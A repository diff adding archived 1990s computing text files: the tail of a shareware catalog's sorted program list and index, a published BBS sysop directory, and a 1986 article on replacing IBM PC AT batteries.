(12-01-93) Just-In-Time Computing Services + New Menus for Windows 1.41 (11-29-94) Dipl.Ing. Roger Rene + Kommer + New Testament for Windows 1.61 (04-04-94) Rocky Mountain + Laboratories + NewBase 1.0 (03-15-95) GWN Software + NFL Forecaster for DOS 2.0d (08-15-94) 100% Cotton Software + NFL Forecaster for Windows 3.0w (06-01-94) 100% Cotton + Software + + Appendix E, "Sorted list of all programs" 777 + + + + Nominal Pipe Size for Windows 2.1 (03-28-94) Herne Data + Systems Ltd + NoteWorthy 1.87 (12-29-94) Braeburn Software + Notice Board 2.2 (03-07-94) Cornerstone Software Limited + NPS - Nominal Pipe Size 2.1 (10-01-92) Herne Data Systems Ltd + NUMERO UNO 1.05 (11-19-94) Christopher J. Noyes Software + O.R.B.Y. 1.0 (12-21-93) Able Art Software + Office Supplies Tracker 1.42 (03-18-94) RMH Computer Services + Official ASP Catalogs n/a (01-01-80) Association of Shareware + Professionals + OMNIDay 4.30 (10-01-94) Unicorn Software Limited + OMNIDay For Windows 2.70 (02-28-95) Unicorn Software Limited + OMS (Organizational Mgmt System 2.3 (11-01-93) Torbert Data + Systems, Inc. + On This Day 2.0 (07-30-94) The Software Construction Co. + On This Day for Windows 2.0 (07-30-94) The Software + Construction Co. + ON-SIDE 2.0 (10-20-93) Expressware Corporation + Open Menu 2.5 (03-18-94) P. C. Softsmith + OpenHome 3.10 (07-16-95) Temprano Software + Over_LAZ HP 4 (01-01-94) Herne Data Systems Ltd + Over_LAZ PS 3 (01-15-93) Herne Data Systems Ltd + OWShare - Delphi 1.0 (08-06-95) Open Windows + OWShare - VB 1.0 (09-09-95) Open Windows + P.I.M. for Word 6.0 for Windows 4.3 DB+ (08-08-95) AMF + PACK TRACKER 4.0 (10-01-94) Robert Barrentine Consulting + Paint Shop 3.0 (08-14-93) JASC, Inc. + Paint Shop Pro 3.11 (08-14-95) JASC, Inc. + PALERT 2.4 (10-22-91) Patri-Soft + Palette Adjuster 1.8 (06-17-95) Lincoln Beach Software + Palette Pleezer 1.25 (04-10-93) Cascoly Software + Paper Route Ledger 1.47 (01-03-95) RMH Computer Services + Papers 1.00 (12-01-93) clySmic Software + PATH_MAN 1.15 (01-01-94) MicroMetric + PATIENCE 10 4.01 (05-21-94) CoCoWare - Cowles Company Software + Patience Abroad 1.01 (05-21-94) CoCoWare - Cowles Company + Software + PATTR 1.5 (11-05-90) Patri-Soft + PC Chart V1.5 (07-15-93) Guru Systems Ltd. + PC-AP 1.8 (01-01-94) Medlin Accounting Shareware + PC-AR 4.3 (01-01-94) Medlin Accounting Shareware + PC-Draft II 3.26 (01-01-93) Natural Software + PC-Draft-CAD 3.06g (12-20-93) Natural Software + PC-ECAP 3.01 (01-24-94) Circuit Systems + PC-FOOD II FOOD COSTING 7.02 (06-03-95) SCHRECK SOFTWARE + PC-Fortune 2.20 (09-30-92) JAYAR Systems + PC-GL 3.8 (01-01-94) Medlin Accounting Shareware + PC-PR 2.4 (02-01-94) Medlin Accounting Shareware + PC-Proof 2.0A (10-18-93) Intellect Systems + PCDESK 5.4 (09-28-95) Robert Lindsay Wells + PCFDial 1.05 (05-26-92) Barn Owl Software + PCINV 1.3 (01-01-94) Medlin Accounting Shareware + PCLoan5 5.09 (09-01-94) Bottom Line Software, Inc. + PCM100.COM 1.01 (08-25-91) Charier Consultants Services + + Appendix E, "Sorted list of all programs" 778 + + + + PCOPY 9.3 (09-01-93) Patri-Soft + PCStat 2.7 (01-01-94) PC Information Systems + PDAILY 1.0 (10-10-86) Patri-Soft + PDEL 4.4 (05-01-92) Patri-Soft + PEG 2.06 (09-13-93) Cascoly Software + PentaBlox 1.01 (08-08-94) Aquila Software + PerCnt VBX 2.5 (08-14-94) Mabry Software + Periodic Table 3.0b (08-22-95) SMI Corporation + Personal Calendar (PC) for DOS 14.71 (11-18-94) FunStuff + Software + Personal Challenge 1.1 (10-04-94) R.K. West Consulting + Personal Com Lib for PowerBASIS 4.2 (09-01-94) MarshallSoft + Computing, Inc. + Personal Comm Lib for BASIC 4.2 (09-01-94) MarshallSoft + Computing, Inc. + Personal Comm Lib for Pascal 4.2 (09-01-94) MarshallSoft + Computing, Inc. + Personal Comm Lib for Windows 1.1 (08-01-94) MarshallSoft + Computing, Inc. + Personal Comm Library for C 4.2 (09-01-94) MarshallSoft + Computing, Inc. + Personal Finances 2 4.02h (01-12-94) Spitfire Software + Personal Hotnet 4.0 (09-30-93) Robichaux and Associates + Personal Protocol Lib 4 Pascal 1.0 (02-12-95) MarshallSoft + Computing, Inc. + Personal Protocol Lib for C/C++ 1.0 (02-12-95) MarshallSoft + Computing, Inc. + Personal Schedule 1.02 (04-20-95) Will Baldwin + Personal Tarot 3.1 (10-04-94) R.K. West Consulting + Personal Time Card 2.6 (10-29-93) Fischer Grafix & Software + Photo Show 3D 1.21 (03-05-95) Progressive Logic + PhotoPat 1.5 (09-30-94) Rainbow Scan, Inc. + PHRASE.ZIP 1.0 (12-20-93) Larry W Parker + Pink Bunny 1.0 (11-20-93) Guy Software + Plain Vanilla Labels 3.15 (01-10-93) Rosewood Software + Playground 1.0a (01-04-95) Object International, Inc. + PLOTTER 7.3 (08-31-95) Robert Lindsay Wells + PMFLCOMP 1.61 (05-30-95) American Coders, LTD. + PMZIP 1.00 (01-14-91) Nico Mak Computing, Inc. + PocketD Plus 4.2 (11-05-94) PocketWare + PoeTrio 1.0 (04-07-91) Chatfield Software, Inc. + Poetry Generator 2.4a (01-28-94) R.K. West Consulting + POETRY STAR 1.1 (03-15-92) Chatfield Software, Inc. + PopDBF 4.05 (07-29-92) Lighthouse Software, Inc. + Portfolio Manager 5.3 (07-15-95) Shane Software International + POST TRACKER 1.0 (01-27-94) Robert Barrentine Consulting + PostCardMaster 4.20 (09-01-94) Unicorn Software Limited + Postit for Windows 3.0 (06-01-95) Henning Associates + Power Edit 2.02 (06-15-95) Target Software + PowerBatch 2.2 (05-15-94) CSD, Inc. + PPRINT 5.5 (11-22-91) Patri-Soft + Practical Joke Collection 2.0 (05-13-95) R.K. West Consulting + PrintEnvelope 3.01 (05-15-95) Maurer Associates + PrintGF 1.26 (09-17-95) Ravitz Software Inc. + + Appendix E, "Sorted list of all programs" 779 + + + + PrintGL 1.58 (09-17-95) Ravitz Software Inc. + ProAct Contact Management 2.6 (01-01-94) ProDomus, Inc. + Probe VBX 1.0 (08-14-94) Mabry Software + ProDev*EPRICE 6.0 (12-06-94) Pro Dev Software + ProDev*MEMBER Church System 3.0g (01-16-95) Pro Dev Software + ProDev*QUOTE Quote/Bid System 6.0c (05-24-95) Pro Dev Software + Professional Capture Systems 2.0 (01-26-95) JASC, Inc. + PROGRAM ENTITY ORGANIZER 1.2 (02-01-94) James W. Young & + Associates, Inc. + Program for a Small Planet 6.0 (10-26-93) Strat-Tech, Inc. + Program Group Specialist 1.0 (05-23-95) MIS Resources + International + A Project/Event Planner 3.4 (12-12-94) Sapphire Software Inc. + Prompter - Speaker's Utility 1.2 (06-11-93) OsoSoft + PROP OPTIMIZER (tm) 1.90 (10-27-93) Bates Engineering/Software + Property Master 4.01 (05-20-94) MSdataBase Solutions + ProtoCAD 3D 2.00 (04-23-94) TRIUS, Inc. + PS-SLEEVE 2.0 (03-01-92) JMJ Software + PSEARCH 5.2B (07-01-92) Patri-Soft + PTOUCH 2.0 (02-03-93) Patri-Soft + PUBLIC ACCESS(tm) 2.5 (09-05-94) IN/QUEST, LLC + Public Address 3.1 (10-05-94) Paradise Programming + Public Library 3.3 (09-05-95) My Little Realm Enterprises + Puffer 1.0 (05-25-95) Kent Briggs + Puffwort's Evil Scheme 1.1 (10-01-95) Impact D. Publishing + PUT, GET, Install Utilities 3.43 (05-05-95) MicroFox Company + q&dBase for Windows 2.0a (10-23-94) Q&D Software Development + QA Study Aid 5.3 (10-14-95) Quid Pro Quo Software + Qanalyst 2.05 (09-19-90) Barn Owl Software + QBALL 2.40 (06-01-94) Benjamin W. Hartley + QENV 2.5 (08-07-94) Annette Cuomo + QFiler 3.2 (07-15-91) Jamestown Software + QFont 1.5 (10-20-90) Jamestown Software + QIC-BAT for CMS 1.2 (11-08-93) Command Line Software + QPACS 3.3 (02-01-95) Richard A. Williams + QRead 2.0 (03-23-95) DS Products + QuickDir 1.32 (11-16-93) SUPERWARE + QuickTax (tm) Planner/Estimator 1.04 (10-27-93) Bates + Engineering/Software + QUIK-INSTALL 2.0 (12-07-93) Michael L. Wester + Quilt 1.32 (04-09-92) Cascoly Software + RACONTEX 3.23 (11-20-93) Guy Software + RADIOSIM 3.0 (04-01-95) BREMENSON + RagTime for Windows 1.0a (10-15-93) Unique Software + Productions + RANGER TRACKER 2.0 (07-08-94) Robert Barrentine Consulting + Ravitz Editor 1.10b (08-12-93) Ravitz Software Inc. + READ 2.9 (09-28-95) Robert Lindsay Wells + REALIZE 1.0 (09-21-94) Transcendental Technologies + Recap 5.1 (08-14-95) R.K. West Consulting + RECIPE FILE MANAGEMENT 3.3 (02-01-94) First Step Software + Recon 2.50 (09-19-94) Amdox Corp. + REFILE 3.1 (04-17-94) MegAS Corporation + Relor Rhyming Dictionary 1.0 (10-02-94) Doyle Bare + + Appendix E, "Sorted list of all programs" 780 + + + + Report Utility for Paradox/DOS 2.04 (02-12-94) The C Group, + Inc. + RESTAURANT COST CONTROL 4.2 (01-15-94) First Step Software + Resume Master Deluxe 4.0 (02-01-94) Whirlwind Technologies + Rev. Lowell's Treasury of Humor 1.01 (03-01-95) Bardon Data + Systems + RexxBase 2.00 (05-15-95) American Coders, LTD. + RI-VB Database Toolkit v1.1 1.1 (02-15-95) MIS Resources + International + The Richard Webster System 4.0 (05-16-95) R.K. West Consulting + RideMatch 1.0 (11-11-93) Paradise Programming + The Right Resume 1.0c (05-01-95) Whirlwind Technologies + RISS Font Pak #1 1.3 (02-25-94) Rhode Island Soft Systems, + Inc. + RISS Icon Pak 1.3 (05-02-94) Rhode Island Soft Systems, Inc. + RMS-III: Ref.Mgn.Sys. 3.2b (03-20-94) Mulberry Software, Inc. + RoboCrap.v94 1.00 (01-02-95) Second Career Software + Rockford! 3.5 (05-01-94) OsoSoft + Rolodeck 1.0 (05-03-95) Henning Associates + Rosenthal UnInstall 1.0 (04-25-94) Rosenthal Engineering + Rosenthal WinLite 1.0 (10-24-93) Rosenthal Engineering + Rosewood Journal 5.02 (09-21-93) Rosewood Software + RoText VBX 1.3 (08-14-94) Mabry Software + RPF Zip Control 2.1.5 (12-03-94) RPF Software + RPMSHARE 3.42 (12-05-94) South Pointe Software + RRKeyCaps & RRKeySampler (PST1) 2.0 (07-24-94) RoadRunner + Computing + RRKeyCaps & RRKeySampler (TT) 2.0 (07-24-94) RoadRunner + Computing + RRKeyCapsGerman (PST1) 2.0 (07-24-94) RoadRunner Computing + RRKeyCapsGerman (TT) 2.0 (07-24-94) RoadRunner Computing + RRMacCaps & RRKeySampler (PST1) 2.0 (07-24-94) RoadRunner + Computing + RRMacCaps & RRKeySampler (TT) 2.0 (07-24-94) RoadRunner + Computing + Rubicon Publisher 2.2C (06-08-91) Rubicon Computer Labs Inc. + RUF100.ZIP 1.0 (03-31-95) MIS Resources International + SAB Diskette Utility 2.50 (01-01-94) Stewart A. Berman + SAC DATABASE 2.7.2 (07-20-95) C & R Business Systems Ltd. + Safe Program 1.00 (07-01-95) Regnoc Software + Sales & Samples 1.0 (04-01-94) C T Johnson, Inc + SC-Scripter 1.0 (08-27-94) SplitCycle Computing + SCAN 494 (04-04-94) EZ Software + SCBA Trak 2.40 (01-28-95) Raymond A.J. Pesek + Schooner 2.50 GUI (03-14-95) Jonathan Cook + SCP 1.04 (11-18-94) Christopher J. Noyes Software + Screen Saver Sampler 2.0 (01-01-95) Damsel Software Group + ScrollZ 2.10 (09-01-94) Unicorn Software Limited + Search-N-Store 3.4 (06-14-94) Shawn Anderson SoftWare + Seascape 1.4 (11-26-93) Advanced Computer Tektonics + Second Guess 1.1 (07-10-95) Arcanum Computing + SEE (File Viewer) 5.10 (05-05-95) MicroFox Company + SensuVoX I 0.00 (01-29-95) Unicorn Software Limited + Serial File Copy 3.5 (06-01-94) MarshallSoft Computing, Inc. + + Appendix E, "Sorted list of all programs" 781 + + + + Service Call Manager 2.0 (02-08-95) CPI computer services + SETUP.EXE - Free 19k Bootstrap 4.6 (08-12-95) Chapter One + Developments Ltd. + Shareware Programmer's Guide n/a (05-21-92) Association of + Shareware Professionals + Shareware Reference Guides n/a (01-01-80) Association of + Shareware Professionals + Shareware Tracker 3.11 (11-05-93) RMH Computer Services + Shell 1.2.3 (07-20-95) C & R Business Systems Ltd. + SHERLOCK 2.73 (12-28-93) Gulf Sierra + Shez 9.5 (10-29-93) California Software Design + SHIP TRACKER 1.2 (03-15-93) Robert Barrentine Consulting + Shooting Gallery 3.3 (02-07-95) Arcanum Computing + ShotZ 3.00 (01-15-92) Unicorn Software Limited + Silver Wolf Desktop 1.0 (12-12-94) Silver Wolf Software + Simply Docs 2.1 (10-29-93) SimpleWare + Simply Help! 1.06 (04-08-92) SimpleWare + Simply Labels 4.02 (02-11-93) SimpleWare + Simstat 3.0e (04-01-94) Provalis Research + SkyGlobe 3.6 (10-15-93) KlassM Software, Inc. + SkyMap 2.1 (07-01-94) Christopher A. Marriott + SLIB10.ZIP 1.0 (03-31-95) MIS Resources International + SMALL BUSINESS ADVISOR 94.4 (10-15-94) RONIN Software + $mart Gambler 1.6 (01-01-94) PC Information Systems + Smart10 2.1 (10-02-94) Sympathetic Software + SmartDraw 2.02 (10-18-95) SmartDraw Software Inc. + SmartDraw 95 2.02 (10-18-95) SmartDraw Software Inc. + SmilerShell 3.0 (03-29-95) Bardon Data Systems + SNAKE 1.0 (10-01-94) Chatfield Software, Inc. + Snooper 3.40 (06-21-95) Vias and Associates + SoundMasterDb 2.02 (09-14-92) TurboSystemsCo + SoundX VBX 1.3 (08-14-94) Mabry Software + SoundZ 4.00 (09-01-94) Unicorn Software Limited + SoundZ For Windows 2.15 (03-09-95) Unicorn Software Limited + SPANISH DRILL! 1.8 (11-09-93) LONE WOLF ENTERPRISES + Spanish Helper Level One 1.5 (10-01-95) G.B. Blanchard + SpeedBack 2.3 (02-12-93) MicroTools Inc + Spelling Sentry 1.3 (04-09-94) Wintertree Software Inc. + SQWEZ 1.0 (04-16-94) JM Software + STACKEY 4.0 (12-23-91) CTRLALT Associates + StarFlic 1.2 (04-14-94) TRIUS, Inc. + StatTrak for Baseball 5.3 (01-15-95) ALL-PRO Software Inc. + Steam Properties 1.0 (06-28-95) + StockQuest 2.10 (07-25-95) Informatik Inc. + Stowaway True Archival System 2.2 (07-29-93) Patri-Soft + Sub-contracor Billing 2.2.1 (07-20-95) C & R Business Systems + Ltd. + Super Stuff Utilities 3.1 (10-11-93) Super Tools + Super VGA Puzzle 2.04 (05-14-94) Cascoly Software + Super!Market 1.10 (12-01-93) Trulli Tops Software, Inc. + SuperDIR 1.1 (08-20-95) Cottonwood Software + SuperFlow V1.10 (10-01-93) Advanced Technology Group, Inc. + SuperFly 2.1 (09-01-94) Arcanum Computing + SuperSet - Environment Extender 1.1 (02-01-95) Ross Leidy + + Appendix E, "Sorted list of all programs" 782 + + + + SwimBase 2.04 (07-15-93) Words to Go + Swimsuit 1.1 (09-15-95) Cascoly Software + SysChk 2.38 (09-01-93) Advanced Personal Systems + System Monitor 3.0 (10-24-93) Rosenthal Engineering + T-Zero 1.04 (11-30-93) Dennis M. Cunningham + Tag Line Xpress 4.00 (05-20-94) Ron Janorkar + Tangram 1.1 (04-15-94) Judah Warshaw + TASK MASTER 2.4c (11-24-93) RKS Software, Inc. + Task Scheduler for DOS 2.5 (08-01-93) Simian Id Software + TC's Personal Data Manager 1.20 (02-17-95) Specific + Applications Software + TC's Toolbox 2.3 (02-17-95) Specific Applications Software + Teach Your Children 2.0 (02-06-95) Q&D Software Development + Technical Editor (DOS) 2.80 (08-15-94) On-Target Software + Technical Editor (OS/2) 2.80 (08-15-94) On-Target Software + Technical Editor (Windows NT) 2.80 (08-15-94) On-Target + Software + Teleshare/DOS Remote Access 3 (06-01-95) P. C. Softsmith + TextPad 16 1.30 (09-02-95) Helios Software Solutions + TextPad 32 1.30 (09-02-95) Helios Software Solutions + Textshot 4.0 (02-03-95) McAdams Associates + Thelma ThistleBlossom 5.20 (12-26-93) Timpanogos Software + Thelma's ClichePlus 1.8 (01-04-94) Timpanogos Software + Thelma's SpellPlus 1.1 (01-04-94) Timpanogos Software + Thoroughbred Handicapper Pro 2.1 (06-15-94) Whirlwind + Technologies + Tile Match 1.2 (09-01-94) Arcanum Computing + Time is Money 2.3 (12-07-94) Custom Data Solutions + Time Keeper 2.7 (10-07-95) Custom Computer Solutions + TimeClock 1.1 (11-01-94) KMR Consulting + Timeclock I 2.4s (04-15-94) Faught Data Systems, Inc. + TMC Calendar & Phone Book 2.1 (01-17-93) Specific Applications + Software + Tolman Dental Program 5.0 (04-01-94) Peter T. Smith D.D.S. + TommySoftware CAD/DRAW 2.04E (06-01-95) TommySoftware, N.A., + Inc. + TommySoftware CAD/DRAW 4 Level1 4.00e (09-12-95) + TommySoftware, N.A., Inc. + TommySoftware Tek Illustrator 3.16e (06-01-95) TommySoftware, + N.A., Inc. + Toolbar 2X for Word 6.0 2.0 (05-02-95) AMF + ToolBOX 1.4 (11-14-93) The Binary Toolshed + TOP 2.0 (11-15-93) TNC Technology + Top Draw 2.0 (06-30-94) Top Software + Total Investor for 1-2-3 DOS 2.1 (11-12-93) Hughes Financial + Services + Total Investor for 1-2-3 Window 3.0 (08-17-95) Hughes + Financial Services + Total Investor for Symphony 2.1 (09-10-93) Hughes Financial + Services + Towers 1.27 (02-20-93) Cascoly Software + Track-It 3.07 (12-29-93) Millennium Software + TRAINER 1.4 (08-20-93) Nine-Patch Software + TRAINING MANAGEMENT SYSTEM 1.2 (04-15-94) Oscar Wenholm + + Appendix E, "Sorted list of all programs" 783 + + + + TRAINING TRACKER 3.0 (02-02-95) Robert Barrentine Consulting + TreeChart 2.00 (08-23-94) FineLine Software + TreeDraw 1.11 (09-04-95) SpanSoft + TreePlan for DOS 2.1 (08-12-93) Decision Support Services + TROOP TRACKER 5.0 (09-10-95) Robert Barrentine Consulting + TROOP TRACKER 4 GIRLS 2.0 (12-20-94) Robert Barrentine + Consulting + TURBO TPU TOOLKIT! 1.5 (03-01-94) LONE WOLF ENTERPRISES + TURF.v93 1.01 (05-14-94) Second Career Software + TUTOR.COM 4.5 (05-01-91) Computer Knowledge + U.S. Geography Tutor 1.0 (04-01-94) On-Target Software + UDECIDE 1.06 (11-10-92) Cascoly Software + ULTIMATE BACCARAT 2.0 (03-15-94) Accidental Software + ULTIMATE BLACKJACK 3.0 (03-15-94) Accidental Software + Ultimate Faxer for Word 6.0 1.0 (05-02-95) AMF + ULTIMATE GIN 1.42 (03-15-94) Accidental Software + UltiMenu 1.00 (08-19-94) Ron Janorkar + Units & Volumes 1.1 (08-01-95) X Libris + Universal Install 2.0 (05-10-94) The GoodSoft Co. + USEMGR 1.0 (03-15-93) XD Systems + Variable Investment Analyst 5.92 (04-01-95) Will Baldwin + VB-Dial 2.1c (11-05-93) Unique Software Productions + Vehicle Costs 2.4 (05-01-94) Graham Ferguson + Vending Machine 1.5 (06-17-95) Lincoln Beach Software + VERSAMAP 1.40 (06-14-94) Charles H. Culberson + Version Control & Maintenance 2.8.1 (07-20-95) C & R Business + Systems Ltd. + VGAWHEEL V.1.91 (12-18-93) WHEEL Games + Video Librarian 4.02 (12-31-93) TurboSystemsCo + VideoMaster 9.00 (11-29-94) Unicorn Software Limited + VideoMaster For Windows 2.10 (03-09-95) Unicorn Software + Limited + ViDir/ViRes File Monitor System 1.02 (02-28-94) Vahnzinn + international + VIEW_MAN 1.10 (10-31-94) MicroMetric + Virus Simulator 2C (01-01-93) Rosenthal Engineering + Visual Calendar Planner 1.1 (02-10-94) Bok Nan Lo + Visual Computer Dictionary Plus 2.0 (05-10-95) BlueStar + Software + Visual Illustrations 1.1 (10-01-95) Impact D. Publishing + VMS40 - EMS emulator (disk) 1.2 (04-05-94) Fugue Software + Volcano Hunter 1.0 (06-15-91) Informative Technologies + VPT 4.15 (12-29-91) clySmic Software + WALL STREET RAIDER 4.2 (04-30-94) RONIN Software + Wall Street Simulator - Windows 1.00 (06-25-94) Larax Software + Water and Steam Properties 1.2 (08-12-94) Katmar Software + WDiff 1.30 (05-29-95) C.Sitte Softwaretechnik + WebForms 1.0h (06-15-95) Q&D Software Development + WebParse 1.1 (09-05-95) Informatik Inc. + WebPen 1.00 (09-05-95) Informatik Inc. + WEBS 1.2 (06-11-92) Cascoly Software + wfListen 3.00 (03-28-94) Prodigy Computing + WhizNotes 2.0 (03-20-94) Advanced Supprt Group, Inc. + Win Change 3.6 (09-30-94) JRE Enterprises + + Appendix E, "Sorted list of all programs" 784 + + + + Win Multiple Configurations 6.2 (10-05-94) JRE Enterprises + WinBrowse 1.6a (04-17-95) Q&D Software Development + WinCap+ 1.00 (05-01-95) The CodeWorks+ Ltd. + WinCharging 1.2 (08-10-95) My Little Realm Enterprises + WinClip 3.5 (04-15-94) OsoSoft + WinDatCon 2.0 (04-18-94) Vogel Scientific Software + The Window BOSS & Data Clerk 8.02 (08-15-94) Star Guidance + Consulting, Inc. + Windows Gourmet 1.2 (01-01-95) Dovcom + Windows Lotto 1.1 (05-01-94) Data Solutions + The Wine Window 1.2 (08-01-95) Prospect Software + WinFlash 3.0 (12-21-93) Open Windows + WinJottr 1.0 (04-10-94) Open Windows + WinKillr 1.0 (05-28-95) Open Windows + WinNET Mail for MS Windows 2.11 (03-24-94) COMPUTER + WITCHCRAFT, INC. + WinOCR 2.0b (09-20-93) SoftTech + WINPAK #1 1.2 (01-20-93) Rhode Island Soft Systems, Inc. + WinPost 3.2b (07-01-93) Eastern Mountain Software + WinPrice 1.0 (02-10-94) Open Windows + WinProof 1.0C (01-28-94) Intellect Systems + WinSecure 2.0 (03-01-94) ViewPoint Software, Inc. + WINstall 1.0a (11-01-94) Dovcom + WinTickler 1.0 (02-22-94) Logic Pulse + WinUpD8R 4.1 (03-12-95) Open Windows + Winvelope 5.0 (06-04-95) Winvelope Software + WInvoices 1.0d (05-31-95) Q&D Software Development + WINWHEEL 1.70 (01-16-93) WHEEL Games + WinZip 5.0 (11-08-93) Nico Mak Computing, Inc. + WINZLE 1.10 (09-15-95) Cascoly Software + Wndlib 1.0 (03-25-94) Burnham Park Software, Inc. + Word Fugue 3.1 R1 (01-15-94) Fugue Software + Word Search Puzzle Maker 2.6 (10-05-95) Impact D. Publishing + WordLink(TM) 1.0 (09-25-95) Redei Enterprises + Wordware v4.0a for WinWord 6 4.0a (08-08-95) AMF + Workbase 4.3 (05-15-95) R.K. West Consulting + WRITE CHINESE 1.00 (05-18-94) Awareness Productions + Writer's Cramp 2.2 (09-30-94) JRE Enterprises + WStyle 1.13 (07-25-93) Wintertree Software Inc. + Wynter Stone's I Ching 1.2 (02-17-95) R.K. West Consulting + Wynter Stone's Quick Guide 1.6 (11-17-94) R.K. West Consulting + x-CAL3 3.31 (05-01-95) Extensions Software Corporation + x-CON3 1.44 (05-01-95) Extensions Software Corporation + x-FILE3 1.74 (05-01-95) Extensions Software Corporation + x-FONE3 2.18 (05-01-95) Extensions Software Corporation + x-FONE4 1.25 (06-18-95) Extensions Software Corporation + x-FORUM3 1.28 (05-01-95) Extensions Software Corporation + x-FORUM4 1.12 (06-18-95) Extensions Software Corporation + x-NEWS3 1.57 (05-01-95) Extensions Software Corporation + x-OUT3 1.44 (05-01-95) Extensions Software Corporation + x-OUT4 1.31 (06-18-95) Extensions Software Corporation + x-SKED3 1.58 (05-01-95) Extensions Software Corporation + XDIR 3.05 (03-09-91) XD Systems + XED 1.1b (08-24-94) David L. Dight + + Appendix E, "Sorted list of all programs" 785 + + + + XFile 2.00 (03-15-95) Phase 33 Digital, Inc. + XFIRE: Action Puzzle game 1.02 (11-30-93) Cascoly Software + XMENU 1.0a (11-22-93) David M. Dibble + XPENS 1.3 (01-01-94) Richard A. Williams + XYSee 4.0a (09-04-94) Insight Advantage + Yellow Sticky for Windows 4.5 4.5 (09-01-95) Henning + Associates + You're Hired! 1.33 (02-05-95) DataWell + Your ESP Test 1.5 (05-19-95) R.K. West Consulting + Z & Z Color 3.1 (09-01-95) Z & Z Software + Z & Z Puzzle 1.0 (09-01-95) Z & Z Software + ZIP Fugue (DOS) for PKZIP/UNZIP 1.2 (04-19-94) Fugue Software + ZIP Fugue (Windows) 2.0 (04-25-94) Fugue Software + Zip Pro 1,0 (11-22-94) Synaptek Software + Zip Server(TM) 1.5 (09-30-95) Redei Enterprises + ZiPaper 1.3c (12-30-91) Daniel Thomas + ZipInf VBX 1.1 (08-14-94) Mabry Software + ZIPKEY 2.04e (05-01-93) Eric Isaacson Software + Zippidy Do Da(tm) 1.3 (02-27-95) SMI Corporation + Zpeller 4.10 (01-01-95) Unicorn Software Limited + + Appendix F, "Supporting Members" 786 + + + + + + Appendix F + Supporting Members + + The Association of Shareware Professionals expresses a special + thanks to the following supporting members: + + + Authors: + David Berdan - ExpressWare Corporation + Richard Cherry Jr. - Cherry Tree Software + Phil Katz - PKWARE, Inc. + Sammy Mitchell - SemWare + + Vendors: + Die Deutsche Software Bibliothek + George Margelis - Bugetware + Gregory N. Wilson - Big Byte Software + Mohiyel-Din Hussein - Husco + Michael C. Comish - Software Excitement! + Arthur Tendler - The $5 Computer Software Store + + BBSs: + Don W. Watkins - CompuServe (IBMNET) + Tess Heder, Brian Miller - Channel 1 + Jon H. Larimore - GLIB + Bruce Jackson - The Break + Dave Harrison - Metro Online + Neil Fleming - Canada Remote Systems + + Index 787 + + + + + + + + Index + + 80286 utilities See: Norton's NDOS See: + Utilities, Hardware Utilities, Software + utilities, tools & add-ins, For JP + 286/386/486-specific Software + 80386 utilities See: + Utilities, Hardware O + utilities, Optical character + 286/386/486-specific recognition See: + 80486 utilities See: Graphics, Business + Utilities, Hardware applications, OCR + utilities, applications + 286/386/486-specific + P + A PKZIP 42 + A86 Macro Assembler 402 ProDev*QUOTE 302 + ASP 167 + ombudsman 637 Q + quotations 167 + C + CompuServe 637 R + Crossword Creator 197 RAM utilities See: + Utilities, Hardware + D utilities, CPU & memory + D86 Debugger 403 Restore See: Utilities, + File utilities, Backup/ + H restore + Handicapped See: retail software 167 + Utilities, Special needs + S + M Soft fonts See: Utilities, + MCGA utilities See: Printer utilities + Utilities, Hardware + utilities, Screen, EGA/ T + VGA specific Trojan horse See: + Memory utilities See: Utilities, Security + Utilities, Hardware programs + utilities, CPU & memory + V + N VGA utilities See: + NDOS See: Utilities, Utilities, Hardware + Software tools & add- utilities, Screen, EGA/ + ins, For JP Software VGA specific + \ No newline at end of file diff --git a/textfiles.com/computers/aspbbs.dlm b/textfiles.com/computers/aspbbs.dlm new file mode 100644 index 00000000..f4c5f980 --- /dev/null +++ b/textfiles.com/computers/aspbbs.dlm @@ -0,0 +1,287 @@ +"SYSOP_LAST_NAME";"SYSOP_FIRST_NAME";"BBS_NAME";"ADDRESS_LINE_1";"ADDRESS_LINE_2";"ADDRESS_LINE_3";"COUNTRY";"VOICE_PHONE";"BBS_PHONE";"FAX_PHONE";"STATUS" +"Abernathy";"Russell";"St Louis Users Group BBS";"PO Box 69099";"St Louis MO 63169";"";"USA";"Not Published";"314-878-7614";"Not Available";"Active" +"Adams";"Arnold";"Seascape! BBS";"PO Box 326";"Morehead City NC 28557";"";"USA";"919-726-6667";"919-726-9364";"Not Available";"Active" +"Albrecht";"Taylor";"Aspenwood BBS";"1220 S Parker Rd #110";"Denver CO 80231";"";"USA";"Not Published";"303-388-0336";"303-671-6305";"Active" +"Aloia";"Rodney A.";"INDEX System (tm), The";"6030 E. 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Hong Kong";"HONG KONG";"Not Published";"011-852-475-2772";"Not Available";"Active" +"Zilles";"Anthony Lloyd";"Baud Room, The";"PO Box 254";"Clifton Hill 3068";"Victoria, Australia";"AUSTRALIA";"Not Published";"+61-3-481-8022";"+61-3-482-2492";"Active" \ No newline at end of file diff --git a/textfiles.com/computers/atamnesa.txt b/textfiles.com/computers/atamnesa.txt new file mode 100644 index 00000000..1ab9dd1f --- /dev/null +++ b/textfiles.com/computers/atamnesa.txt @@ -0,0 +1,48 @@ + IBM Wouldn't Do This, Would They? + (But They Did!) + + I am not currently an AT user. Otherwise, I might have discovered + this before now and probably at some inconvenience. I pass it on so + that many of you who are using AT's might be aware of the possible + inconvenience Big Blue has planned for AT users. The following item + appeared in the Lotus Magazine, Vol.2, No.9, September, 1986 (p. 26). + + - Jack Kilday, Sysop + Northern Lights BBS + 207-766-2467 2400/1200 + + + Preventing PC AT Amnesia + + If you've never pulled the cover off an IBM PC AT, you may not realize + that there is a battery inside. If that news comes as a surprise, + there's no need to be embarrassed; you apparently have a lot of + company. + + According to Alex Papakyriakou, general manager of International + Battery Corp. (IBC) (Reseda, Calif.), a sizable number of IBM PC AT + owners -- including some large-scale corporate buyers -- are just + realizing this because the batteries are beginning to fail. This + causes the loss of not only time and date information but also + internally stored configuration information like the machine's memory + size and type and number of disk drives. + + When a PC AT's battery fades out, you are forced to enter the + configuration info each time you start the system -- a tedious process + that leads to a quick search for a replacement battery. The + difficulty users face in finding the batteries is what got IBC into + the AT battery business. + + IBC was getting requests for the 6-volt lithium units and couldn't + find a supplier until they came across Tadiran, a major battery + manufacturer headquartered in Israel. + + IBC obtained exclusive rights to aftermarkets sales of Tadiran's + AT-compatible batteries and is selling them by mail order for $27.50, + which Papakyriakou claims is $15 less than IBM sells them for. But + IBC is likely to have competition soon in this lucrative market. The + market-research firm Dataquest (San Jose, Calif.) estimates there will + be more than one million IBM AT's in use by the end of 1986, each + having a battery that runs out of juice every one to three years. + + \ No newline at end of file diff --git 